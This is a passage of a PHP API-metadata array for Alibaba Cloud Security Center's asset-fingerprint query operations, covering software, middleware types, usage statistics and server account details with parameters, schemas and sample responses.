['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server to be queried.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the software to be queried.', 'type' => 'string', 'required' => false, 'example' => 'kernel', 'title' => ''], ], [ 'name' => 'Path', 'in' => 'query', 'schema' => ['description' => 'The installation path of the software.', 'type' => 'string', 'required' => false, 'example' => '/etc/test', 'title' => ''], ], [ 'name' => 'SoftwareVersion', 'in' => 'query', 'schema' => ['description' => 'The version information of the software.', 'type' => 'string', 'required' => false, 'example' => '3.10.0', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.', 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'Set which page of the returned results to start displaying the query results. The default value is **1**, indicating that the display starts from the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Set the number of software asset fingerprint information items displayed per page during pagination. The default value is **10**, indicating that 10 items of software asset fingerprint information are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'InstallTimeStart', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the software update started. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649321495000', 'title' => ''], ], [ 'name' => 'InstallTimeEnd', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the software update ended. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1650012695000', 'title' => ''], ], [ 'name' => 'Extend', 'in' => 'query', 'schema' => ['description' => 'Whether the software name supports fuzzy search. To enable fuzzy search, set the value of this parameter to 1; other values or an empty value indicate that fuzzy search is not supported.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Whether to use the NextToken method to pull asset list data. If this parameter is used, TotalCount will no longer be returned. Values:'."\n" ."\n" .'- **true**: Use the NextToken method.'."\n" .'- **false**: Do not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'Used to mark the starting position for reading. Leave it blank to start from the beginning.'."\n" ."\n" .'> For the first call, you do not need to fill this in; the response will include the NextToken for the second call, and each subsequent call\'s response will contain the NextToken for the next call.', 'type' => 'string', 'required' => false, 'example' => 'E17B501887A2D3AA5E8360A6EFA3B***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the current request, generated by Alibaba Cloud as a unique identifier for the request, which can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '6AEE7412-0065-1135-B790-AE2C38BA68FB', 'title' => ''], 'PageInfo' => [ 'description' => 'Information displayed on the query result page.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page during pagination.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of software asset fingerprint information displayed per page when performing a paginated query. The default value is **10**, indicating that 10 pieces of software asset fingerprint information are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of fingerprint information for the queried software assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of fingerprint information of software assets displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned using the NextToken method.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'Details list of the queried software asset\'s fingerprint information.', 'type' => 'array', 'items' => [ 'description' => 'Details list of the fingerprint information of the queried software assets.', 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Ip' => ['description' => 'List of server IPs', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '100.104.XX.XX', 'title' => ''], 'InstallTime' => ['description' => 'The installation time of the software.', 'type' => 'string', 'example' => '2022-04-07 10:54:49', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'Version' => ['description' => 'The version information of the software asset.', 'type' => 'string', 'example' => '3.10.0', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'Path' => ['description' => 'The installation directory information of the software asset.', 'type' => 'string', 'example' => '/etc/test', 'title' => ''], 'Name' => ['description' => 'The name of the software.', 'type' => 'string', 'example' => 'aaa_base', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of the latest scan of the asset fingerprint. The unit is milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649149566000', 'title' => ''], 'InstallTimeDt' => ['description' => 'The installation timestamp of the software. The unit is in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649066826000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve detailed information of a software in the software list', 'summary' => 'Query details of asset fingerprint software collection', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertySoftwareDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertySoftwareDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"6AEE7412-0065-1135-B790-AE2C38BA68FB\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\",\\n \\"InstallTime\\": \\"2022-04-07 10:54:49\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"Version\\": \\"3.10.0\\",\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"Path\\": \\"/etc/test\\",\\n \\"Name\\": \\"aaa_base\\",\\n \\"CreateTimestamp\\": 1649149566000,\\n \\"InstallTimeDt\\": 1649066826000\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 6AEE7412-0065-1135-B790-AE2C38BA68FB\\n \\n 1\\n 10\\n 1\\n 1\\n \\n \\n 192.168.XX.XX\\n 192.168.XX.XX\\n i-hp35tftuh52wbp1g****\\n 100.104.XX.XX\\n 2022-04-07 10:54:49\\n 162eb349-c2d9-4f8b-805c-75b43d4c****\\n 3.10.0\\n hc-host-****\\n /etc/test\\n aaa_base\\n 1649149566000\\n \\n","errorExample":""}]', ], 'DescribePropertySoftwareItem' => [ 'summary' => 'Queries information about all software assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data that you want to query.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the software that you want to query.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '3A85CFCF-05C8-451A-9E41-C0D5E96BA407', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5037', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'An array that consists of the software assets returned.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the software.'."\n", 'type' => 'string', 'example' => 'aaa_base', 'title' => ''], 'Count' => ['description' => 'The number of servers on which the software is installed.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribePropertySoftwareItem', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertySoftwareItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertySoftwareItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"3A85CFCF-05C8-451A-9E41-C0D5E96BA407\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 2,\\n \\"TotalCount\\": 5037,\\n \\"Count\\": 2\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"Name\\": \\"aaa_base\\",\\n \\"Count\\": 23\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\r\\n\\r\\n\\t\\r\\n\\t\\t\\t2\\r\\n\\t\\t\\t2\\r\\n\\t\\t\\t5037\\r\\n\\t\\t\\t1\\r\\n\\t\\r\\n\\t\\r\\n\\t\\t\\ta11y-profile-manager-indicator\\r\\n\\t\\t\\t1\\r\\n\\t\\r\\n\\t\\r\\n\\t\\t\\taaa_base\\r\\n\\t\\t\\t23\\r\\n\\t\\r\\n\\t3A85CFCF-05C8-451A-9E41-C0D5E96BA407\\r\\n\\t","errorExample":""}]', ], 'DescribePropertyTypeScaItem' => [ 'summary' => 'Queries middleware types.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: 1.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B7A839E8-70AE-591D-8D9E-C5419A22****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyTypeItems' => [ 'description' => 'An array that consists of the middleware types.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the middleware type.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the middleware. Valid values:'."\n" ."\n" .'* **system_service**: system service'."\n" .'* **software_library**: software library'."\n" .'* **docker_component**: container component'."\n" .'* **database**: database'."\n" .'* **web_container**: web container'."\n" .'* **jar**: JAR package'."\n" .'* **web_framework**: web framework'."\n", 'type' => 'string', 'example' => 'docker_component', 'title' => ''], 'Name' => ['description' => 'The name of the middleware type.'."\n", 'type' => 'string', 'example' => 'Docker Component', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B7A839E8-70AE-591D-8D9E-C5419A22****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 20\\n },\\n \\"PropertyTypeItems\\": [\\n {\\n \\"Type\\": \\"docker_component\\",\\n \\"Name\\": \\"Docker Component\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribePropertyTypeScaItem', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyTypeScaItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyTypeScaItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribePropertyUsageTop' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92165', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The Asset Fingerprints type. Valid values:'."\n" ."\n" .'- **port**: port'."\n" .'- **process**: process'."\n" .'- **software**: software'."\n" .'- **user**: account'."\n" .'- **sca**: middleware.', 'type' => 'string', 'required' => true, 'example' => 'port', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The Asset Fingerprints type. Valid values:'."\n" ."\n" .'- **port**: port'."\n" .'- **process**: process'."\n" .'- **software**: software'."\n" .'- **user**: account'."\n" .'- **sca**: middleware.', 'type' => 'string', 'example' => 'sca', 'title' => ''], 'ItemCount' => ['description' => 'The number of fingerprints.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '16AA5B62-A3C1-520B-B289-4BD971CC17AB', 'title' => ''], 'TopStatisticItems' => [ 'description' => 'The collection of statistics results.', 'type' => 'array', 'items' => [ 'description' => 'The individual statistics result.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The statistics item.', 'type' => 'string', 'example' => 'openssl', 'title' => ''], 'Count' => ['description' => 'The count.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset fingerprints statistics by type', 'summary' => 'Retrieves the top 5 statistics information for ports, processes, software, accounts, or middleware by occurrence count in your assets using the Asset Fingerprints feature.', 'description' => 'Only Security Center Enterprise or Ultimate Edition users can call this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUsageTop'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyUsageTop', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Type\\": \\"sca\\",\\n \\"ItemCount\\": 5,\\n \\"RequestId\\": \\"16AA5B62-A3C1-520B-B289-4BD971CC17AB\\",\\n \\"TopStatisticItems\\": [\\n {\\n \\"Name\\": \\"openssl\\",\\n \\"Count\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePropertyUserDetail' => [ 'summary' => 'Queries the Asset Fingerprints information of account assets on a server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server to query.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'User', 'in' => 'query', 'schema' => ['description' => 'The account name on the server to query.', 'type' => 'string', 'required' => false, 'example' => 'bin', 'title' => ''], ], [ 'name' => 'IsRoot', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the account to query has ROOT permissions. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.', 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in a paginated query. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of account asset fingerprint entries per page in a paging query. Default value: **10**, which indicates 10 account asset fingerprint entries per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'LastLoginTimeStart', 'in' => 'query', 'schema' => ['description' => 'The start timestamp for querying the last logon time of the account. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '164922523600', 'title' => ''], ], [ 'name' => 'LastLoginTimeEnd', 'in' => 'query', 'schema' => ['description' => 'The end timestamp for querying the last logon time of the account. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651298836000', 'title' => ''], ], [ 'name' => 'Extend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether fuzzy match is supported for account names. Set this parameter to **1** to enable fuzzy match. Any other value or an empty value indicates that fuzzy match is not supported.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve the vulnerability list data. If this parameter is used, TotalCount is no longer returned. Valid values:'."\n" ."\n" .'- **true**: Uses the NextToken method.'."\n" .'- **false**: Does not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The token that marks the current position from which to start reading. Leave this parameter empty to start from the beginning.'."\n" ."\n" .'> Do not specify this parameter for the first call. The response includes the NextToken value for the second call. Each subsequent response contains the NextToken value for the next call.', 'type' => 'string', 'required' => false, 'example' => 'E17B501887A2D3AA5E8360A6EFA3B***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '33A71BE3-2CC2-14CB-B460-33A1DD82953A', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of account asset fingerprint entries per page in a paging query. Default value: **10**, which indicates 10 account asset fingerprint entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of account asset fingerprint entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of account asset fingerprint entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The details of the account asset fingerprint entries returned.', 'type' => 'array', 'items' => [ 'description' => 'The details of the account asset fingerprint entries returned.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'string', 'example' => '**', 'title' => ''], 'LastLoginIp' => ['description' => 'The source IP address of the last logon of the account.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'LastLoginTime' => ['description' => 'The time of the last logon of the account.', 'type' => 'string', 'example' => '2022-04-04 18:07:06', 'title' => ''], 'IsRoot' => ['description' => 'Indicates whether the account has ROOT permissions. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'string', 'example' => '0', 'title' => ''], 'Ip' => ['description' => 'The list of IP addresses of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'User' => ['description' => 'The name of the account.', 'type' => 'string', 'example' => 'bin', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '100.104.XX.XX', 'title' => ''], 'PasswordExpirationDate' => ['description' => 'The expiration time of the account password.', 'type' => 'string', 'example' => 'never', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'LastLoginTimestamp' => ['description' => 'The timestamp of the last logon of the account. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649066826000', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'AccountsExpirationDate' => ['description' => 'The expiration time of the account.', 'type' => 'string', 'example' => 'never', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of the latest Asset Fingerprints scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649149566000', 'title' => ''], 'GroupNames' => [ 'description' => 'The details of the user groups to which the account belongs.', 'type' => 'array', 'items' => ['description' => 'The details of the user groups to which the account belongs.', 'type' => 'string', 'example' => '["bin"]', 'title' => ''], 'title' => '', 'example' => '', ], 'LastLoginTimeDt' => ['description' => 'The timestamp of the last logon of the account. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649066826000', 'title' => ''], 'IsPasswdExpired' => ['description' => 'Indicates whether the password has expired. Valid values:'."\n" ."\n" .'- **0**: Expired.'."\n" .'- **1**: Not expired.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'IsPasswdLocked' => ['description' => 'Indicates whether the password is locked. Valid values:'."\n" ."\n" .'- **0**: Locked.'."\n" .'- **1**: Not locked.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'IsUserExpired' => ['description' => 'Indicates whether the user has expired. Valid values:'."\n" ."\n" .'- **0**: Expired.'."\n" .'- **1**: Not expired.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'IsCouldLogin' => ['description' => 'Indicates whether the account is an interactive logon account. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'IsSudoer' => ['description' => 'Indicates whether the account is a sudo account. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query account asset fingerprint information of a server', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUserDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyUserDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"33A71BE3-2CC2-14CB-B460-33A1DD82953A\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1,\\n 